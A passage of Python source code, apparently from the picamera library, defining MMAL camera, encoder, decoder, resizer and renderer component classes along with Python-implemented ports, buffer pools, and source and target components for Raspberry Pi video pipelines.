return MMALCamera.annotate_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE]) + 1
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
def _set_annotate_rev(self, value):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = MMALCamera.annotate_structs[value - 1]
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "invalid camera annotation structure revision")
annotate_rev = property(_get_annotate_rev, _set_annotate_rev, doc="""\
The annotation capabilities of the firmware have evolved over time and
several structures are available for querying and setting video
annotations. By default the :class:`MMALCamera` class will pick the
latest annotation structure supported by the current firmware but you
can select older revisions with :attr:`annotate_rev` for other purposes
(e.g. testing).
""")
class MMALCameraInfo(MMALBaseComponent):
"""
Represents the MMAL camera-info component. Query the
``MMAL_PARAMETER_CAMERA_INFO`` parameter on the control port to obtain
information about the connected camera module.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA_INFO
info_structs = (
mmal.MMAL_PARAMETER_CAMERA_INFO_T,
mmal.MMAL_PARAMETER_CAMERA_INFO_V2_T,
)
def __init__(self):
super(MMALCameraInfo, self).__init__()
if PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] is None:
found = False
# try smallest structure to largest as later firmwares reject
# older structures
for struct in MMALCameraInfo.info_structs:
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = struct
self.control.params[mmal.MMAL_PARAMETER_CAMERA_INFO]
except PiCameraMMALError:
pass
else:
found = True
break
if not found:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = None
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera info structure revision")
def _get_info_rev(self):
try:
return MMALCameraInfo.info_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO]) + 1
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera info structure revision")
def _set_info_rev(self, value):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = MMALCameraInfo.info_structs[value - 1]
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "invalid camera info structure revision")
info_rev = property(_get_info_rev, _set_info_rev, doc="""\
The camera information capabilities of the firmware have evolved over
time and several structures are available for querying camera
information. When initialized, :class:`MMALCameraInfo` will attempt
to discover which structure is in use by the extant firmware. This
property can be used to discover the structure version and to modify
the version in use for other purposes (e.g. testing).
""")
class MMALComponent(MMALBaseComponent):
"""
Represents an MMAL component that acts as a filter of some sort, with a
single input that connects to an upstream source port. This is an asbtract
base class.
"""
__slots__ = ()
def __init__(self):
super(MMALComponent, self).__init__()
assert len(self.opaque_input_subformats) == 1
def close(self):
self.disconnect()
super(MMALComponent, self).close()
def enable(self):
super(MMALComponent, self).enable()
if self.connection is not None:
self.connection.enable()
def disable(self):
if self.connection is not None:
self.connection.disable()
super(MMALComponent, self).disable()
def connect(self, source, **options):
"""
Connects the input port of this component to the specified *source*
:class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
convenience (primarily intended for command line experimentation; don't
use this in scripts), *source* can be another component in which case
the first unconnected output port will be selected as *source*.
Keyword arguments will be passed along to the connection constructor.
See :class:`MMALConnection` and :class:`MMALPythonConnection` for
further information.
"""
if isinstance(source, (MMALPort, MMALPythonPort)):
return self.inputs[0].connect(source)
else:
for port in source.outputs:
if not port.connection:
return self.inputs[0].connect(port, **options)
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
def disconnect(self):
"""
Destroy the connection between this component's input port and the
upstream component.
"""
self.inputs[0].disconnect()
@property
def connection(self):
"""
The :class:`MMALConnection` or :class:`MMALPythonConnection` object
linking this component to the upstream component.
"""
return self.inputs[0].connection
class MMALSplitter(MMALComponent):
"""
Represents the MMAL splitter component. This component has 1 input port
and 4 output ports which all generate duplicates of buffers passed to the
input port.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_SPLITTER
opaque_input_subformats = ('OPQV-single',)
opaque_output_subformats = ('OPQV-single',) * 4
class MMALISPResizer(MMALComponent):
"""
Represents the MMAL ISP resizer component. This component has 1 input port
and 1 output port, and supports resizing via the VideoCore ISP, along with
conversion of numerous formats into numerous other formats (e.g. OPAQUE to
RGB, etc). This is more efficient than :class:`MMALResizer` but is only
available on later firmware versions.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_ISP
opaque_input_subformats = ('OPQV-single',)
opaque_output_subformats = (None,)
class MMALResizer(MMALComponent):
"""
Represents the MMAL VPU resizer component. This component has 1 input port
and 1 output port. This supports resizing via the VPU. This is not as
efficient as :class:`MMALISPResizer` but is available on all firmware
verions. The output port can (and usually should) have a different frame
size to the input port.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_RESIZER
opaque_input_subformats = (None,)
opaque_output_subformats = (None,)
class MMALEncoder(MMALComponent):
"""
Represents a generic MMAL encoder. This is an abstract base class.
"""
__slots__ = ()
class MMALVideoEncoder(MMALEncoder):
"""
Represents the MMAL video encoder component. This component has 1 input
port and 1 output port. The output port is usually configured with
``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_ENCODER
opaque_input_subformats = ('OPQV-dual',)
opaque_output_subformats = (None,)
class MMALImageEncoder(MMALEncoder):
"""
Represents the MMAL image encoder component. This component has 1 input
port and 1 output port. The output port is typically configured with
``MMAL_ENCODING_JPEG`` but can also use ``MMAL_ENCODING_PNG``,
``MMAL_ENCODING_GIF``, etc.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_ENCODER
opaque_input_subformats = ('OPQV-strips',)
opaque_output_subformats = (None,)
class MMALDecoder(MMALComponent):
"""
Represents a generic MMAL decoder. This is an abstract base class.
"""
__slots__ = ()
class MMALVideoDecoder(MMALDecoder):
"""
Represents the MMAL video decoder component. This component has 1 input
port and 1 output port. The input port is usually configured with
``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_DECODER
opaque_input_subformats = (None,)
opaque_output_subformats = ('OPQV-single',)
class MMALImageDecoder(MMALDecoder):
"""
Represents the MMAL iamge decoder component. This component has 1 input
port and 1 output port. The input port is usually configured with
``MMAL_ENCODING_JPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_DECODER
opaque_input_subformats = (None,)
opaque_output_subformats = ('OPQV-single',)
class MMALRenderer(MMALComponent):
"""
Represents the MMAL renderer component. This component has 1 input port and
0 output ports. It is used to implement the camera preview and overlays.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_RENDERER
opaque_input_subformats = ('OPQV-single',)
class MMALNullSink(MMALComponent):
"""
Represents the MMAL null-sink component. This component has 1 input port
and 0 output ports. It is used to keep the preview port "alive" (and thus
calculating white-balance and exposure) when the camera preview is not
required.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_NULL_SINK
opaque_input_subformats = ('OPQV-single',)
class MMALPythonPort(MMALObject):
"""
Implements ports for Python-based MMAL components.
"""
__slots__ = (
'_buffer_count',
'_buffer_size',
'_connection',
'_enabled',
'_owner',
'_pool',
'_type',
'_index',
'_supported_formats',
'_format',
'_callback',
)
_FORMAT_BPP = {
'I420': 1.5,
'RGB3': 3,
'RGBA': 4,
'BGR3': 3,
'BGRA': 4,
}
def __init__(self, owner, port_type, index):
self._buffer_count = 2
self._buffer_size = 0
self._connection = None
self._enabled = False
self._owner = weakref.ref(owner)
self._pool = None
self._callback = None
self._type = port_type
self._index = index
self._supported_formats = {
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
}
self._format = ct.pointer(mmal.MMAL_ES_FORMAT_T(
type=mmal.MMAL_ES_TYPE_VIDEO,
encoding=mmal.MMAL_ENCODING_I420,
es=ct.pointer(mmal.MMAL_ES_SPECIFIC_FORMAT_T())))
def close(self):
self.disconnect()
self.disable()
self._format = None
def __repr__(self):
return '<MMALPythonPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d frames=%s@%sfps>' % (
self.name, mmal.FOURCC_str(self.format), self.buffer_count,
self.buffer_size, self.framesize, self.framerate)
def _get_bitrate(self):
return self._format[0].bitrate
def _set_bitrate(self, value):
self._format[0].bitrate = value
bitrate = property(_get_bitrate, _set_bitrate, doc="""\
Retrieves or sets the bitrate limit for the port's format.
""")
def _get_supported_formats(self):
return self._supported_formats
def _set_supported_formats(self, value):
try:
value = {f for f in value}
except TypeError:
value = {value}
if not value:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "port must have at least one valid format")
self._supported_formats = value
supported_formats = property(_get_supported_formats, _set_supported_formats, doc="""\
Retrieves or sets the set of valid formats for this port. The set must
always contain at least one valid format. A single format can be
specified; it will be converted implicitly to a singleton set.
If the current port :attr:`format` is not a member of the new set, no
error is raised. An error will be raised when :meth:`commit` is next
called if :attr:`format` is still not a member of the set.
""")
def _get_format(self):
return self._format[0].encoding
def _set_format(self, value):
self._format[0].encoding = value
format = property(_get_format, _set_format, doc="""\
Retrieves or sets the encoding format of the port. Setting this
attribute implicitly sets the encoding variant to a sensible value
(I420 in the case of OPAQUE).
""")
def _get_framesize(self):
return PiResolution(
self._format[0].es[0].video.crop.width,
self._format[0].es[0].video.crop.height,
)
def _set_framesize(self, value):
value = to_resolution(value)
video = self._format[0].es[0].video
video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
video.crop.width = value.width
video.crop.height = value.height
framesize = property(_get_framesize, _set_framesize, doc="""\
Retrieves or sets the size of the source's video frames as a (width,
height) tuple. This attribute implicitly handles scaling the given
size up to the block size of the camera (32x16).
""")
def _get_framerate(self):
video = self._format[0].es[0].video
try:
return Fraction(
video.frame_rate.num,
video.frame_rate.den)
except ZeroDivisionError:
return Fraction(0, 1)
def _set_framerate(self, value):
value = to_fraction(value)
video = self._format[0].es[0].video
video.frame_rate.num = value.numerator
video.frame_rate.den = value.denominator
framerate = property(_get_framerate, _set_framerate, doc="""\
Retrieves or sets the framerate of the port's video frames in fps.
""")
@property
def pool(self):
"""
Returns the :class:`MMALPool` associated with the buffer, if any.
"""
return self._pool
@property
def opaque_subformat(self):
return None
def _get_buffer_count(self):
return self._buffer_count
def _set_buffer_count(self, value):
if value < 1:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
self._buffer_count = int(value)
buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
The number of buffers allocated (or to be allocated) to the port. The
default is 2 but more may be required in the case of long pipelines
with replicated buffers.
""")
def _get_buffer_size(self):
return self._buffer_size
def _set_buffer_size(self, value):
if value < 0:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
self._buffer_size = value
buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
The size of buffers allocated (or to be allocated) to the port. The
size of buffers defaults to a value dictated by the port's format.
""")
def copy_from(self, source):
"""
Copies the port's :attr:`format` from the *source*
:class:`MMALControlPort`.
"""
if isinstance(source, MMALPythonPort):
mmal.mmal_format_copy(self._format, source._format)
else:
mmal.mmal_format_copy(self._format, source._port[0].format)
def commit(self):
"""
Commits the port's configuration and automatically updates the number
and size of associated buffers. This is typically called after
adjusting the port's format and/or associated settings (like width and
height for video ports).
"""
if self.format not in self.supported_formats:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'invalid format for port %r' % self)
self._buffer_count = 2
video = self._format[0].es[0].video
try:
self._buffer_size = int(
MMALPythonPort._FORMAT_BPP[str(self.format)]
* video.width
* video.height)
except KeyError:
# If it's an unknown / encoded format just leave the buffer size
# alone and hope the owning component knows what to set
pass
self._owner()._commit_port(self)
@property
def enabled(self):
"""
Returns a :class:`bool` indicating whether the port is currently
enabled. Unlike other classes, this is a read-only property. Use
:meth:`enable` and :meth:`disable` to modify the value.
"""
return self._enabled
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. Any return value will be ignored.
"""
if self._connection is not None:
if callback is not None:
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'connected ports must be enabled without callback')
else:
if callback is None:
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'unconnected ports must be enabled with callback')
if self.type == mmal.MMAL_PORT_TYPE_INPUT or self._connection is None:
self._pool = MMALPythonPortPool(self)
self._callback = callback
self._enabled = True
def disable(self):
"""
Disable the port.
"""
self._enabled = False
if self._pool is not None:
# Release any unprocessed buffers from the owner's queue before
# we destroy them all
while True:
buf = self._owner()._queue.get(False)
if buf:
buf.release()
else:
break
self._pool.close()
self._pool = None
self._callback = None
def get_buffer(self, block=True, timeout=None):
"""
Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
and *timeout* act as they do in the corresponding
:meth:`MMALPool.get_buffer`.
"""
if not self._enabled:
raise PiCameraPortDisabled(
'cannot get buffer from disabled port %s' % self.name)
if self._pool is not None:
# Unconnected port or input port case; retrieve buffer from the
# allocated pool
return self._pool.get_buffer(block, timeout)
else:
# Connected output port case; get a buffer from the target input
# port (in this case the port is just a thin proxy for the
# corresponding input port)
assert self.type == mmal.MMAL_PORT_TYPE_OUTPUT
return self._connection.target.get_buffer(block, timeout)
def send_buffer(self, buf):
"""
Send :class:`MMALBuffer` *buf* to the port.
"""
# NOTE: The MMALPythonConnection callback must occur *before* the test
# for the port being enabled; it's meant to be the connection making
# the callback prior to the buffer getting to the port after all
if (
self.type == mmal.MMAL_PORT_TYPE_INPUT and
self._connection._callback is not None):
try:
modified_buf = self._connection._callback(self._connection, buf)
except:
buf.release()
raise
else:
if modified_buf is None:
buf.release()
else:
buf = modified_buf
if not self._enabled:
raise PiCameraPortDisabled(
'cannot send buffer to disabled port %s' % self.name)
if self._callback is not None:
# but what about output ports?
try:
# XXX Return value? If it's an input port we should ignore it,
self._callback(self, buf)
except:
buf.release()
raise
if self._type == mmal.MMAL_PORT_TYPE_INPUT:
# Input port case; queue the buffer for processing on the
# owning component
self._owner()._queue.put(buf)
elif self._connection is None:
# Unconnected output port case; release the buffer back to the
# pool
buf.release()
else:
# Connected output port case; forward the buffer to the
# connected component's input port
# XXX If it's a format-change event?
self._connection.target.send_buffer(buf)
@property
def name(self):
return '%s:%s:%d' % (self._owner().name, {
mmal.MMAL_PORT_TYPE_OUTPUT: 'out',
mmal.MMAL_PORT_TYPE_INPUT: 'in',
mmal.MMAL_PORT_TYPE_CONTROL: 'control',
mmal.MMAL_PORT_TYPE_CLOCK: 'clock',
}[self.type], self._index)
@property
def type(self):
"""
The type of the port. One of:
* MMAL_PORT_TYPE_OUTPUT
* MMAL_PORT_TYPE_INPUT
* MMAL_PORT_TYPE_CONTROL
* MMAL_PORT_TYPE_CLOCK
"""
return self._type
@property
def capabilities(self):
"""
The capabilities of the port. A bitfield of the following:
* MMAL_PORT_CAPABILITY_PASSTHROUGH
* MMAL_PORT_CAPABILITY_ALLOCATION
* MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
"""
return mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
@property
def index(self):
"""
Returns an integer indicating the port's position within its owning
list (inputs, outputs, etc.)
"""
return self._index
@property
def connection(self):
"""
If this port is connected to another, this property holds the
:class:`MMALConnection` or :class:`MMALPythonConnection` object which
represents that connection. If this port is not connected, this
property is ``None``.
"""
return self._connection
def connect(self, other, **options):
"""
Connect this port to the *other* :class:`MMALPort` (or
:class:`MMALPythonPort`). The type and configuration of the connection
will be automatically selected.
Various connection options can be specified as keyword arguments. These
will be passed onto the :class:`MMALConnection` or
:class:`MMALPythonConnection` constructor that is called (see those
classes for an explanation of the available options).
"""
# Always construct connections from the output end
if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
return other.connect(self, **options)
if other.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError(
'A connection can only be established between an output and '
'an input port')
return MMALPythonConnection(self, other, **options)
def disconnect(self):
"""
Destroy the connection between this port and another port.
"""
if self.connection is not None:
self.connection.close()
class MMALPythonPortPool(MMALPool):
"""
Creates a pool of buffer headers for an :class:`MMALPythonPort`. This is
only used when a fake port is used without a corresponding
:class:`MMALPythonConnection`.
"""
__slots__ = ('_port',)
def __init__(self, port):
super(MMALPythonPortPool, self).__init__(
mmal.mmal_pool_create(port.buffer_count, port.buffer_size))
self._port = port
@property
def port(self):
return self._port
def send_buffer(self, port=None, block=True, timeout=None):
"""
Get a buffer from the pool and send it to *port* (or the port the pool
is associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPythonPortPool, self).send_buffer(port, block, timeout)
def send_all_buffers(self, port=None, block=True, timeout=None):
"""
Send all buffers from the pool to *port* (or the port the pool is
associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPythonPortPool, self).send_all_buffers(port, block, timeout)
class MMALPythonBaseComponent(MMALObject):
"""
Base class for Python-implemented MMAL components. This class provides the
:meth:`_commit_port` method used by descendents to control their ports'
behaviour, and the :attr:`enabled` property. However, it is unlikely that
users will want to sub-class this directly. See
:class:`MMALPythonComponent` for a more useful starting point.
"""
__slots__ = ('_inputs', '_outputs', '_enabled',)
def __init__(self):
super(MMALPythonBaseComponent, self).__init__()
self._enabled = False
self._inputs = ()
self._outputs = ()
# TODO Control port?
def close(self):
"""
Close the component and release all its resources. After this is
called, most methods will raise exceptions if called.
"""
self.disable()
@property
def enabled(self):
"""
Returns ``True`` if the component is currently enabled. Use
:meth:`enable` and :meth:`disable` to control the component's state.
"""
return self._enabled
def enable(self):
"""
Enable the component. When a component is enabled it will process data
sent to its input port(s), sending the results to buffers on its output
port(s). Components may be implicitly enabled by connections.
"""
self._enabled = True
def disable(self):
"""
Disables the component.
"""
self._enabled = False
@property
def control(self):
"""
The :class:`MMALControlPort` control port of the component which can be
used to configure most aspects of the component's behaviour.
"""
return None
@property
def inputs(self):
"""
A sequence of :class:`MMALPort` objects representing the inputs
of the component.
"""
return self._inputs
@property
def outputs(self):
"""
A sequence of :class:`MMALPort` objects representing the outputs
of the component.
"""
return self._outputs
def _commit_port(self, port):
"""
Called by ports when their format is committed. Descendents may
override this to reconfigure output ports when input ports are
committed, or to raise errors if the new port configuration is
unacceptable.
.. warning::
This method must *not* reconfigure input ports when called; however
it can reconfigure *output* ports when input ports are committed.
"""
pass
def __repr__(self):
if self._outputs:
return '<%s "%s": %d inputs %d outputs>' % (
self.__class__.__name__, self.name,
len(self.inputs), len(self.outputs))
else:
return '<%s closed>' % self.__class__.__name__
class MMALPythonSource(MMALPythonBaseComponent):
"""
Provides a source for other :class:`MMALComponent` instances. The
specified *input* is read in chunks the size of the configured output
buffer(s) until the input is exhausted. The :meth:`wait` method can be
used to block until this occurs. If the output buffer is configured to
use a full-frame unencoded format (like I420 or RGB), frame-end flags will
be automatically generated by the source. When the input is exhausted an
empty buffer with the End Of Stream (EOS) flag will be sent.
The component provides all picamera's usual IO-handling characteristics; if
*input* is a string, a file with that name will be opened as the input and
closed implicitly when the component is closed. Otherwise, the input will
not be closed implicitly (the component did not open it, so the assumption
is that closing *input* is the caller's responsibility). If *input* is an
object with a ``read`` method it is assumed to be a file-like object and is
used as is. Otherwise, *input* is assumed to be a readable object
supporting the buffer protocol (which is wrapped in a :class:`BufferIO`
stream).
"""
__slots__ = ('_stream', '_opened', '_thread')
def __init__(self, input):
super(MMALPythonSource, self).__init__()
self._inputs = ()
self._outputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, 0),)
self._stream, self._opened = open_stream(input, output=False)
self._thread = None
def close(self):
super(MMALPythonSource, self).close()
if self._outputs:
self._outputs[0].close()
self._outputs = ()
if self._stream:
close_stream(self._stream, self._opened)
self._stream = None
def enable(self):
super(MMALPythonSource, self).enable()
self._thread = Thread(target=self._send_run)
self._thread.daemon = True
self._thread.start()
def disable(self):
super(MMALPythonSource, self).disable()
if self._thread:
self._thread.join()
self._thread = None
def wait(self, timeout=None):
"""
Wait for the source to send all bytes from the specified input. If
*timeout* is specified, it is the number of seconds to wait for
completion. The method returns ``True`` if the source completed within
the specified timeout and ``False`` otherwise.
"""
if not self.enabled:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'cannot wait on disabled component')
self._thread.join(timeout)
return not self._thread.is_alive()
def _send_run(self):
# Calculate the size of a frame if possible (i.e. when the output
# format is an unencoded full frame format). If it's an unknown /
# encoded format, we've no idea what the framesize is (this would
# presumably require decoding the stream) so leave framesize as None.
video = self._outputs[0]._format[0].es[0].video
try:
framesize = (
MMALPythonPort._FORMAT_BPP[str(self._outputs[0].format)]
* video.width
* video.height)
except KeyError:
framesize = None
frameleft = framesize
while self.enabled:
buf = self._outputs[0].get_buffer(timeout=0.1)
if buf:
try:
if frameleft is None:
send = buf.size
else:
send = min(frameleft, buf.size)
with buf as data:
if send == buf.size:
try:
# readinto() is by far the fastest method of
# getting data into the buffer
buf.length = self._stream.readinto(data)
except AttributeError:
# if there's no readinto() method, fallback on
# read() and the data setter (memmove)
buf.data = self._stream.read(buf.size)
else:
buf.data = self._stream.read(send)
if frameleft is not None:
frameleft -= buf.length
if not frameleft:
buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END
frameleft = framesize
if not buf.length:
buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_EOS
break
finally:
self._outputs[0].send_buffer(buf)
@property
def name(self):
return 'py.source'
class MMALPythonComponent(MMALPythonBaseComponent):
"""
Provides a Python-based MMAL component with a *name*, a single input and
the specified number of *outputs* (default 1). The :meth:`connect` and
:meth:`disconnect` methods can be used to establish or break a connection
from the input port to an upstream component.
Typically descendents will override the :meth:`_handle_frame` method to
respond to buffers sent to the input port, and will set
:attr:`MMALPythonPort.supported_formats` in the constructor to define the
formats that the component will work with.
"""
__slots__ = ('_name', '_thread', '_queue', '_error')
def __init__(self, name='py.component', outputs=1):
super(MMALPythonComponent, self).__init__()
self._name = name
self._thread = None
self._error = None
self._queue = MMALQueue.create()
self._inputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_INPUT, 0),)
self._outputs = tuple(
MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, n)
for n in range(outputs)
)
def close(self):
super(MMALPythonComponent, self).close()
self.disconnect()
if self._inputs:
self._inputs[0].close()
self._inputs = ()
for output in self._outputs:
output.disable()
self._outputs = ()
self._queue.close()
self._queue = None
def connect(self, source, **options):
"""
Connects the input port of this component to the specified *source*
:class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
convenience (primarily intended for command line experimentation; don't
use this in scripts), *source* can be another component in which case
the first unconnected output port will be selected as *source*.
Keyword arguments will be passed along to the connection constructor.
See :class:`MMALConnection` and :class:`MMALPythonConnection` for
further information.
"""
if isinstance(source, (MMALPort, MMALPythonPort)):
return self.inputs[0].connect(source)
else:
for port in source.outputs:
if not port.connection:
return self.inputs[0].connect(port, **options)
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
def disconnect(self):
"""
Destroy the connection between this component's input port and the
upstream component.
"""
self.inputs[0].disconnect()
@property
def connection(self):
"""
The :class:`MMALConnection` or :class:`MMALPythonConnection` object
linking this component to the upstream component.
"""
return self.inputs[0].connection
@property
def name(self):
return self._name
def _commit_port(self, port):
"""
Overridden to to copy the input port's configuration to the output
port(s), and to ensure that the output port(s)' format(s) match
the input port's format.
"""
super(MMALPythonComponent, self)._commit_port(port)
if port.type == mmal.MMAL_PORT_TYPE_INPUT:
for output in self.outputs:
output.copy_from(port)
elif port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
if port.format != self.inputs[0].format:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'output format mismatch')
def enable(self):
super(MMALPythonComponent, self).enable()
if not self._thread:
self._thread = Thread(target=self._thread_run)
self._thread.daemon = True
self._thread.start()
def disable(self):
super(MMALPythonComponent, self).disable()
if self._thread:
self._thread.join()
self._thread = None
if self._error:
raise self._error
def _thread_run(self):
try:
while self._enabled:
buf = self._queue.get(timeout=0.1)
if buf:
try:
handler = {
0: self._handle_frame,
mmal.MMAL_EVENT_PARAMETER_CHANGED: self._handle_parameter_changed,
mmal.MMAL_EVENT_FORMAT_CHANGED: self._handle_format_changed,
mmal.MMAL_EVENT_ERROR: self._handle_error,
mmal.MMAL_EVENT_EOS: self._handle_end_of_stream,
}[buf.command]
if handler(self.inputs[0], buf):
self._enabled = False
finally:
buf.release()
except Exception as e:
self._error = e
self._enabled = False
def _handle_frame(self, port, buf):
"""
Handles frame data buffers (where :attr:`MMALBuffer.command` is set to
0).
Typically, if the component has output ports, the method is expected to
fetch a buffer from the output port(s), write data into them, and send
them back to their respective ports.
Return values are as for normal event handlers (``True`` when no more
buffers are expected, ``False`` otherwise).
"""
return False
def _handle_format_changed(self, port, buf):
"""
Handles format change events passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_FORMAT_CHANGED).
The default implementation re-configures the input port of the
component and emits the event on all output ports for downstream
processing. Override this method if you wish to do something else in
response to format change events.
The *port* parameter is the port into which the event arrived, and
*buf* contains the event itself (a MMAL_EVENT_FORMAT_CHANGED_T
structure). Use ``mmal_event_format_changed_get`` on the buffer's data
to extract the event.
"""
with buf as data:
event = mmal.mmal_event_format_changed_get(buf._buf)
if port.connection:
# Handle format change on the source output port, if any. We
# don't check the output port capabilities because it was the
# port that emitted the format change in the first case so it'd
# be odd if it didn't support them (or the format requested)!
output = port.connection._source
output.disable()
if isinstance(output, MMALPythonPort):
mmal.mmal_format_copy(output._format, event[0].format)
else:
mmal.mmal_format_copy(output._port[0].format, event[0].format)
output.commit()
output.buffer_count = (
event[0].buffer_num_recommended
if event[0].buffer_num_recommended > 0 else
event[0].buffer_num_min)
output.buffer_size = (
event[0].buffer_size_recommended
if event[0].buffer_size_recommended > 0 else
event[0].buffer_size_min)
if isinstance(output, MMALPythonPort):
output.enable()
else:
output.enable(port.connection._transfer)
# Now deal with the format change on this input port (this is only
# called from _thread_run so port must be an input port)
try:
if not (port.capabilities & mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE):
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'port %s does not support event change' % self.name)
mmal.mmal_format_copy(port._format, event[0].format)
self._commit_port(port)
port.pool.resize(
event[0].buffer_num_recommended
if event[0].buffer_num_recommended > 0 else
event[0].buffer_num_min,
event[0].buffer_size_recommended
if event[0].buffer_size_recommended > 0 else
event[0].buffer_size_min)
port.buffer_count = len(port.pool)
port.buffer_size = port.pool[0].size
except:
# If this port can't handle the format change, or if anything goes
# wrong (like the owning component doesn't like the new format)
# stop the pipeline (from here at least)
if port.connection:
port.connection.disable()
raise
# Chain the format-change onward so everything downstream sees it.
# NOTE: the callback isn't given the format-change because there's no
# image data in it
for output in self.outputs:
out_buf = output.get_buffer()
out_buf.copy_from(buf)
output.send_buffer(out_buf)
return False
def _handle_parameter_changed(self, port, buf):
"""
Handles parameter change events passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_PARAMETER_CHANGED).
The default implementation does nothing but return ``False``
(indicating that processing should continue). Override this in
descendents to respond to parameter changes.
The *port* parameter is the port into which the event arrived, and
*buf* contains the event itself (a MMAL_EVENT_PARAMETER_CHANGED_T
structure).
"""
return False
def _handle_error(self, port, buf):
"""
Handles error notifications passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_ERROR).
The default implementation does nothing but return ``True`` (indicating
that processing should halt). Override this in descendents to respond
to error events.
The *port* parameter is the port into which the event arrived.
"""
return True
def _handle_end_of_stream(self, port, buf):
"""
Handles end-of-stream notifications passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_EOS).
The default implementation does nothing but return ``True`` (indicating
that processing should halt). Override this in descendents to respond
to the end of stream.
The *port* parameter is the port into which the event arrived.
"""
return True
class MMALPythonTarget(MMALPythonComponent):
"""
Provides a simple component that writes all received buffers to the
specified *output* until a frame with the *done* flag is seen (defaults to
MMAL_BUFFER_HEADER_FLAG_EOS indicating End Of Stream).
The component provides all picamera's usual IO-handling characteristics; if
*output* is a string, a file with that name will be opened as the output
and closed implicitly when the component is closed. Otherwise, the output
will not be closed implicitly (the component did not open it, so the
assumption is that closing *output* is the caller's responsibility). If
*output* is an object with a ``write`` method it is assumed to be a
file-like object and is used as is. Otherwise, *output* is assumed to be a
writeable object supporting the buffer protocol (which is wrapped in a
:class:`BufferIO` stream).
"""
__slots__ = ('_opened', '_stream', '_done', '_event')
def __init__(self, output, done=mmal.MMAL_BUFFER_HEADER_FLAG_EOS):
super(MMALPythonTarget, self).__init__(name='py.target', outputs=0)
self._stream, self._opened = open_stream(output)
self._done = done
self._event = Event()
# Accept all the formats picamera generally produces (user can add
# other esoteric stuff if they need to)
self.inputs[0].supported_formats = {
mmal.MMAL_ENCODING_MJPEG,
mmal.MMAL_ENCODING_H264,
mmal.MMAL_ENCODING_JPEG,
mmal.MMAL_ENCODING_GIF,
mmal.MMAL_ENCODING_PNG,
